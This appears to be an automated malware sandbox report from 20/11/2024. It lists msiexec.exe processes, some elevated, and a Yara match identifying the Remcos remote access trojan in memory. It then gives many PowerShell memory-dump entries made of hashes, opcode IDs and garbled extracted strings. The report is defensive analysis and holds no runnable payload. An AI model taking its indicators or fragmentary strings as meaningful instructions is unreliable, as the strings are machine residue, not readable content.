                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:8
                                                                  Start time:10:53:48
                                                                  Start date:20/11/2024
                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                  Imagebase:0x180000
                                                                  File size:59'904 bytes
                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.2700386932.0000000008398000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:12
                                                                  Start time:10:54:05
                                                                  Start date:20/11/2024
                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\System32\msiexec.exe"
                                                                  Imagebase:0x180000
                                                                  File size:59'904 bytes
                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Reset < >
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2426186109.00007FF848C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff848c40000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 71324c3e49d122f0c0172aaa127baed73fad7ee7d998c07d8eb3b077d53941b9
                                                                    • Instruction ID: f1bc9c2e8688d1e4496b6cfa8e8a46be6a2d458682c17d45cffebcd1c1241ace
                                                                    • Opcode Fuzzy Hash: 71324c3e49d122f0c0172aaa127baed73fad7ee7d998c07d8eb3b077d53941b9
                                                                    • Instruction Fuzzy Hash: 04F1C33090CA8D8FEBA8EF28C8557E937D1FF54350F04426AE84DC72A5DF3498818B81
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2426186109.00007FF848C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff848c40000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 20da8e850dd75d21385c515bc8b51183b1605f2b5724f725f2bce87f3e67f29f
                                                                    • Instruction ID: 805876e9c02a1c8d8a92a6c54aea42244e9b6e7493099779ba4ac38756a4f472
                                                                    • Opcode Fuzzy Hash: 20da8e850dd75d21385c515bc8b51183b1605f2b5724f725f2bce87f3e67f29f
                                                                    • Instruction Fuzzy Hash: A7E1B33090CA4D8FEBA8EF28C8557E977D1FF54750F14426AD84DC7295DF38A9818B81
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2429657151.00007FF848EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff848ec0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @SH
                                                                    • API String ID: 0-2824597440
                                                                    • Opcode ID: 71dafd87bc5d644b64356b2d6cd9bbd6b68b222f6bdfc3ec394ee078ec48d944
                                                                    • Instruction ID: c5c3bc18e43fad0bb86a0c87d40b26674b377d67cc61b92a3b4763513ef5a419
                                                                    • Opcode Fuzzy Hash: 71dafd87bc5d644b64356b2d6cd9bbd6b68b222f6bdfc3ec394ee078ec48d944
                                                                    • Instruction Fuzzy Hash: CEF10332E0EA858FE79ABB2858552787BE1FF96650F1801FAC04DC71D3DF28AC458356
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2426721522.00007FF848D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D10000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff848d10000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 79dec0b7829f68eac99e0c7e734e8b7d627269c66a08b949452827a2cef20f4f
                                                                    • Instruction ID: edb38e0b669c752496a6568dce554de61e1c4b4da0afe574f5ffa35a0d08ac53
                                                                    • Opcode Fuzzy Hash: 79dec0b7829f68eac99e0c7e734e8b7d627269c66a08b949452827a2cef20f4f
                                                                    • Instruction Fuzzy Hash: 76424521D0FA8A4FF396AB2858156B97BE3EF56690F0801BED04DC71D3DF1898498356
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2426186109.00007FF848C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff848c40000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5bfab7614fea0033cf5ae9a21504ddd0ebbabefe07a95378478af4bb1cd958be
                                                                    • Instruction ID: e2fa0b990d217d3c5aff2aada0bbcb709b0e33cb6388bca35e788655b13bd5a6
                                                                    • Opcode Fuzzy Hash: 5bfab7614fea0033cf5ae9a21504ddd0ebbabefe07a95378478af4bb1cd958be
                                                                    • Instruction Fuzzy Hash: 48329E30A1CA4D8FDB89EF58C495AE9BBF1FF98750F100169E009D7296DB35E881CB85
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2426721522.00007FF848D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D10000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff848d10000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cbf980ece4fdf4bc873057bec78d68ee3359b15700bfa7e3f9aa4366064b780b
                                                                    • Instruction ID: ebb22c6c80fe5f2b8d633ec5e3f725f41f93ecf226769f13fea671d38340a70c
                                                                    • Opcode Fuzzy Hash: cbf980ece4fdf4bc873057bec78d68ee3359b15700bfa7e3f9aa4366064b780b
                                                                    • Instruction Fuzzy Hash: 2CC13231E0FA8A5FEB99BB2868556B97BE1EF15394F0801BAD00DC7193DB18AC09C355
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2426186109.00007FF848C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff848c40000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9280efa53e2b676bd84f14ca135e483f171a4ca8b8765bf75e19211a2dc08bc7
                                                                    • Instruction ID: b1c984790464c4b3e3816ee3b5fd31f741250470bd1f07fc897ec73f7baa76f1
                                                                    • Opcode Fuzzy Hash: 9280efa53e2b676bd84f14ca135e483f171a4ca8b8765bf75e19211a2dc08bc7
                                                                    • Instruction Fuzzy Hash: 99B1D63050CA8D8FDBA9EF28D8557E93BE1FF55350F04426AE84DC7292CB349985CB86
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2426721522.00007FF848D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D10000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff848d10000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d257ae32736fbd53464f895d1a31f073d1e03b459753ac9215d28720f012c36a
                                                                    • Instruction ID: 5046af3890472b35b8ba6451edc8dc4d20ad7a84060748862a871e305b5703fb
                                                                    • Opcode Fuzzy Hash: d257ae32736fbd53464f895d1a31f073d1e03b459753ac9215d28720f012c36a
                                                                    • Instruction Fuzzy Hash: AA21F631E1FA4A4FF3D9AE2C145537566D3FF956A0F9801BAD00DC7193EE18AC898209
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2426186109.00007FF848C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff848c40000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 52f6849bf1d9b59887baaf5bff67ebf7c17d194c3dfbaac63a8dc4df049ffc73
                                                                    • Instruction ID: 4ba2b877b02bcbafc0c5f9f68a06eecbd7cc4e297730c0865fdcad288d5c3ef9
                                                                    • Opcode Fuzzy Hash: 52f6849bf1d9b59887baaf5bff67ebf7c17d194c3dfbaac63a8dc4df049ffc73
                                                                    • Instruction Fuzzy Hash: EA31D53091D64E8EFBF4EF15CD1ABF93290FB42B99F401239D84D860A2CB786985CB55
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2426721522.00007FF848D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D10000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff848d10000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 17e735d0401e32bb1741e8a8e70436dad825784399b5f6bfbf0ac8970a81d192
                                                                    • Instruction ID: 5a5427c1e526d569217a668845b251c6c8fdd189364da090cfdc3489106cde51
                                                                    • Opcode Fuzzy Hash: 17e735d0401e32bb1741e8a8e70436dad825784399b5f6bfbf0ac8970a81d192
                                                                    • Instruction Fuzzy Hash: 2321D122E1F6D55FE395F63C285A2B86AE1EF5AA90F0844FED04DCB1D3CE184C498316
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2426186109.00007FF848C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff848c40000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9ef4804f57fee93b02dd8bcd90f0bf0fbc29114ddd0783b9c72026b09af2c762
                                                                    • Instruction ID: a2cffd6589228435148380d94143afa431462d747f27e2ede83b4e2ac15b423b
                                                                    • Opcode Fuzzy Hash: 9ef4804f57fee93b02dd8bcd90f0bf0fbc29114ddd0783b9c72026b09af2c762
                                                                    • Instruction Fuzzy Hash: C001677111CB0C4FD788EF0CE451AA5B7E0FB95364F10056DE58AC3651DB36E881CB45
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2426721522.00007FF848D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D10000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff848d10000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2b1e23a82bac0a9a80f0090fe128488713e5a06af5e7e40ca67b66f34c15bdc8
                                                                    • Instruction ID: d0b35f8707d3c13df01f2c6ab4973c7da969cdc37472678819e71f75fb5fe8fa
                                                                    • Opcode Fuzzy Hash: 2b1e23a82bac0a9a80f0090fe128488713e5a06af5e7e40ca67b66f34c15bdc8
                                                                    • Instruction Fuzzy Hash: 66F0E232A0F6885FEB96E7ACA4892ECBBE0EF58260F1411BFC04DD3143DA2908458750
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2550078765.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7820000_powershell.jbxd
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2550078765.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7820000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7be4b225270d24961c9fca862aa044adefebd12803a9efa5a2da129cd17048c5
                                                                    • Instruction ID: b12d676032529763adb467d521c0c18bb3996d971781130481571e3b16303de2
                                                                    • Opcode Fuzzy Hash: 7be4b225270d24961c9fca862aa044adefebd12803a9efa5a2da129cd17048c5
                                                                    • Instruction Fuzzy Hash: C221ACB13043656BD7214E798850736BBE6EF91701F24846AE985CB2D2CE798CC6D3B1
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2559922258.00000000092E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 092E0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_92e0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9bd1e46522786840485ebe34129dce998d6b8c91a245d10cbd1ce616cbee9bcd
                                                                    • Instruction ID: 1c0a63ecac5bde4a071eb8f8b91b675864712f4cfde63c3d4efb7e9e7a2b7e6e
                                                                    • Opcode Fuzzy Hash: 9bd1e46522786840485ebe34129dce998d6b8c91a245d10cbd1ce616cbee9bcd
                                                                    • Instruction Fuzzy Hash: 78D022608294B9CE876285180CA4AE43FA6888200034EE6B9E4901A029C61AD898C240
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2550078765.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7820000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$4']q$4']q$4']q$tP]q$tP]q$t~pq$$]q$$]q$$]q$$]q
                                                                    • API String ID: 0-107699449
                                                                    • Opcode ID: c788da58f8b1b76ef0905987af1710a000f6cb3431991a61585eb26a5a45758a
                                                                    • Instruction ID: 20cd705adcf197a4d8a905968030fa66a2e54f386fe4077f701d29e5c86ffd28
                                                                    • Opcode Fuzzy Hash: c788da58f8b1b76ef0905987af1710a000f6cb3431991a61585eb26a5a45758a
                                                                    • Instruction Fuzzy Hash: 22F146B1F0022A9FC7249F69844466ABBE6AFD5312F34847AD845CB251DF35CC83D7A2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2550078765.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7820000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$4']q$4']q$4']q$tP]q$tP]q$#j$$]q$$]q$$]q$$j
                                                                    • API String ID: 0-3280127866
                                                                    • Opcode ID: 240407dd07078e2c0857ef5ddde852c48b1b7b252cd43fcfa603de82fc9c5f89
                                                                    • Instruction ID: 1662e595f530ab305451a9a4ffc7afc21780e7074beaf2c94587e3a4ad0b7d2c
                                                                    • Opcode Fuzzy Hash: 240407dd07078e2c0857ef5ddde852c48b1b7b252cd43fcfa603de82fc9c5f89
                                                                    • Instruction Fuzzy Hash: BAD158B2704326DFCF148F29941077ABBE6AFA1712F14847AD841CB261DB35D887D7A2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2550078765.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7820000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$4']q$4']q$4']q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                    • API String ID: 0-267665775
                                                                    • Opcode ID: e8e618dfbfb162b5e2f4c15d8fe8481c042b5ebfff5c410fe9799f0625b9ddd2
                                                                    • Instruction ID: c93780699e639ae47f65cbf2f043a66426d8820a369bfe7510062b14cecbfc5a
                                                                    • Opcode Fuzzy Hash: e8e618dfbfb162b5e2f4c15d8fe8481c042b5ebfff5c410fe9799f0625b9ddd2
                                                                    • Instruction Fuzzy Hash: 60A169B170432A9FC7258E389C54A3ABBE5BF91252F15807AD905CB251DF35D8C3D3A1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2550078765.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7820000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$4']q$d%cq$d%cq$d%cq$d%cq$tP]q$tP]q$$]q
                                                                    • API String ID: 0-3118609902
                                                                    • Opcode ID: f0cc5e1d7ff837a518f084a0b1a50e72c0bf1f2636b5a0ba197190f5217c8ac3
                                                                    • Instruction ID: 3bddda772fa0f38f931d451a30c4d9f559892227bcca1f2f0396dacc596201f1
                                                                    • Opcode Fuzzy Hash: f0cc5e1d7ff837a518f084a0b1a50e72c0bf1f2636b5a0ba197190f5217c8ac3
                                                                    • Instruction Fuzzy Hash: FE71F5B1B002299FCB248F29C550A7EBBE6EF94715F24846AD801DB390DB35DD82D7B1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2550078765.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7820000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$4']q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                    • API String ID: 0-3118171705
                                                                    • Opcode ID: 83d31a5c251e38138ad1a5e23cdf437ae5124138de68b4dab77e5cfae764d07f
                                                                    • Instruction ID: 16098f2416c3317b4810fc68fa9891cfb4cb15f49d675292208bb05af6d61d2b
                                                                    • Opcode Fuzzy Hash: 83d31a5c251e38138ad1a5e23cdf437ae5124138de68b4dab77e5cfae764d07f
                                                                    • Instruction Fuzzy Hash: DEF19EB17043A6DFCB188F79D45066ABBF5EFA1212F24846AD848CB251DB35CC82D771
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2550078765.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7820000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$4']q$tP]q$tP]q$$]q$$]q$$]q
                                                                    • API String ID: 0-108373575
                                                                    • Opcode ID: 288a33157f4fd58b7b5ec662807a6ec9e04a80df415f9ef96721d67766ba72c4
                                                                    • Instruction ID: ccd6bb1d254e09da79833d041971b08cdb8d4dd98f0236b6a731cb7f8c60a8b8
                                                                    • Opcode Fuzzy Hash: 288a33157f4fd58b7b5ec662807a6ec9e04a80df415f9ef96721d67766ba72c4
                                                                    • Instruction Fuzzy Hash: 03F17BB2B043269FC7149F68941067ABBE5EFD1321F14807AD845DB2A1DF36E887C7A1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2550078765.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7820000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$tP]q$tP]q$$]q$(cq$(cq$(cq
                                                                    • API String ID: 0-537408273
                                                                    • Opcode ID: 4f66bcccd7d10c04b913eb56294a7d5db9831e08b48a0ec708374197daecdd6b
                                                                    • Instruction ID: a11581d37a595ad17f2d06375fffc84809885bd128b3e59797f532185ca27eb7
                                                                    • Opcode Fuzzy Hash: 4f66bcccd7d10c04b913eb56294a7d5db9831e08b48a0ec708374197daecdd6b
                                                                    • Instruction Fuzzy Hash: EA71C2B0B00226DFDB248E14C544B6ABFF2AFA5716F198499E804DB290D731EDC2DB71
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2550078765.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7820000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: W$tP]q$tP]q$$]q$$]q$$]q
                                                                    • API String ID: 0-2560603547
                                                                    • Opcode ID: 9bb9ab207ab6113f9dfbecb213990203b9878c9e79b12b7e06bb14a29c34ac8a
                                                                    • Instruction ID: 8bdaea4a29c66c091d229ffed7a52cbfc5e8936f3306e9bf54efc62a6cbd064a
                                                                    • Opcode Fuzzy Hash: 9bb9ab207ab6113f9dfbecb213990203b9878c9e79b12b7e06bb14a29c34ac8a
                                                                    • Instruction Fuzzy Hash: 8F916BB17043269FC7248E698860767FBE6EF92712F24C47BD445CB691DA39C883C791
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2550078765.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7820000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: tP]q$tP]q$$]q$$]q$$]q$$]q
                                                                    • API String ID: 0-656377573
                                                                    • Opcode ID: d202c0d767a138371241571d8acbe32913d2b6c04ecd68e8df754affa4a2d5be
                                                                    • Instruction ID: 2ae4b50f65f47fc546faf9b1b90dce57c1ffc1207f5e2b898cd86719ddb991ab
                                                                    • Opcode Fuzzy Hash: d202c0d767a138371241571d8acbe32913d2b6c04ecd68e8df754affa4a2d5be
                                                                    • Instruction Fuzzy Hash: 1F516DF23043255FD7248E699850B27BBE6EFD1326F14847AD544CB361CE36D886C3A1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2550078765.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7820000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$d%cq$d%cq$d%cq$tP]q$$]q
                                                                    • API String ID: 0-3562389410
                                                                    • Opcode ID: f484d4f90a6881adec3308d4c1cc223e87b717db830c66684c5376803daaec0a
                                                                    • Instruction ID: 8b5e2399e1930159fb0773938c226fe4e213dea8da72c0d12682b42086817c99
                                                                    • Opcode Fuzzy Hash: f484d4f90a6881adec3308d4c1cc223e87b717db830c66684c5376803daaec0a
                                                                    • Instruction Fuzzy Hash: 5851E3F1A00226DFCB24CF15C540A7EBBE1AF65616F28846AD841DB291D731DDC2DBB1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2550078765.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7820000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$tP]q$$]q$$]q$$]q
                                                                    • API String ID: 0-2702571027
                                                                    • Opcode ID: f5d86218314b44d053b7a754f44ba2a8b57e950daacab4c83866a4709060b9b8
                                                                    • Instruction ID: c9b3f392f8544cd29176777bcca0b98b3c6849ce04a88b1531a04ca88ba26875
                                                                    • Opcode Fuzzy Hash: f5d86218314b44d053b7a754f44ba2a8b57e950daacab4c83866a4709060b9b8
                                                                    • Instruction Fuzzy Hash: C961BFF070422ADFDB248E15C544B7A7BE1AB65717F288466E801DB290CB35DCC2EBB1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2550078765.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7820000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$4']q$$]q$$]q$$]q
                                                                    • API String ID: 0-2353078639
                                                                    • Opcode ID: 55117ddce784f706aac7645cde8619c1ff2b87b4620349f7f1b85370417fd815
                                                                    • Instruction ID: 9ae5b1d019770865e32c747d4aac48a04873e80be9ce1374f1a4e625d9073799
                                                                    • Opcode Fuzzy Hash: 55117ddce784f706aac7645cde8619c1ff2b87b4620349f7f1b85370417fd815
                                                                    • Instruction Fuzzy Hash: 07315BB2B0426ACFCB280E69945017EB7D5AFA9162B24447BC845CB165CA35C4C7E771
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2550078765.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7820000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$tP]q$$]q$$]q$$]q
                                                                    • API String ID: 0-2702571027
                                                                    • Opcode ID: f24941b7aae1824bfb7fa3fe1c588a8a2c5cf5f773530d2721aa33558f4de089
                                                                    • Instruction ID: f6a403390aac0374dd8987dca1a7ff43c903baf3fc0fe5119eb01e8023d4be05
                                                                    • Opcode Fuzzy Hash: f24941b7aae1824bfb7fa3fe1c588a8a2c5cf5f773530d2721aa33558f4de089
                                                                    • Instruction Fuzzy Hash: 2D31B3B1B0022AEFDF288E05C940BA6B7E1FF65766F18C066D815DB290C775D8C2DB91
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2550078765.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7820000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$d%cq$d%cq$d%cq$tP]q
                                                                    • API String ID: 0-1723543176
                                                                    • Opcode ID: 9fe5ad8d364105dc7b45acc097d2d05d4ba8c6b293c00b6ae457377c71d5c52a
                                                                    • Instruction ID: 82b6ddda3432cf47ad531b0f5bdf5a245c571c66f2d0f1a3e74d2e93f353f4f3
                                                                    • Opcode Fuzzy Hash: 9fe5ad8d364105dc7b45acc097d2d05d4ba8c6b293c00b6ae457377c71d5c52a
                                                                    • Instruction Fuzzy Hash: AD31A4B1A402259FC764CF59C440A6EBBE2EB98715F248556E906EB350C732DC82CBA0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2550078765.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7820000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (o]q$(o]q$(o]q$(o]q
                                                                    • API String ID: 0-1261621458
                                                                    • Opcode ID: bff12f22b643cf9ecbfb3043e626358e2deb81334b96c5721aec9c16311fd7cc
                                                                    • Instruction ID: 071391b5df42bb72d45f132e049c7065f4006f6ee59b02479415c3f390ecc8c2
                                                                    • Opcode Fuzzy Hash: bff12f22b643cf9ecbfb3043e626358e2deb81334b96c5721aec9c16311fd7cc
                                                                    • Instruction Fuzzy Hash: 9EF124B170432ADFCB158F68D81477EBBA2EF95312F14846AE405CB291DB35C886D7B1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2550078765.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7820000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: XRbq$XRbq$tP]q$$]q
                                                                    • API String ID: 0-2385373255
                                                                    • Opcode ID: 27e5e8c538f7c51d1f1498e4d1ac0069cbc3308d7c003e026da4517d0351f92e
                                                                    • Instruction ID: f461a2748f6a014335e941c0e191fee64b19f9d84dbc0b24a52f5900702ecbfa
                                                                    • Opcode Fuzzy Hash: 27e5e8c538f7c51d1f1498e4d1ac0069cbc3308d7c003e026da4517d0351f92e
                                                                    • Instruction Fuzzy Hash: C94174B0B00225EFCB248E19C144AAABBF2AB95726F15C099D804DB364C775DDC2DBB1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2550078765.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7820000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q$W$$]q$$]q
                                                                    • API String ID: 0-1502658858
                                                                    • Opcode ID: de8ce5d19a09135b0af6c61d6b8cff483c5b76f01c31a3d2e164a8aff7f4c597
                                                                    • Instruction ID: ae20e6d10532ffb0b73596f83b6d86459f86962407d06491d828036d5cc101c6
                                                                    • Opcode Fuzzy Hash: de8ce5d19a09135b0af6c61d6b8cff483c5b76f01c31a3d2e164a8aff7f4c597
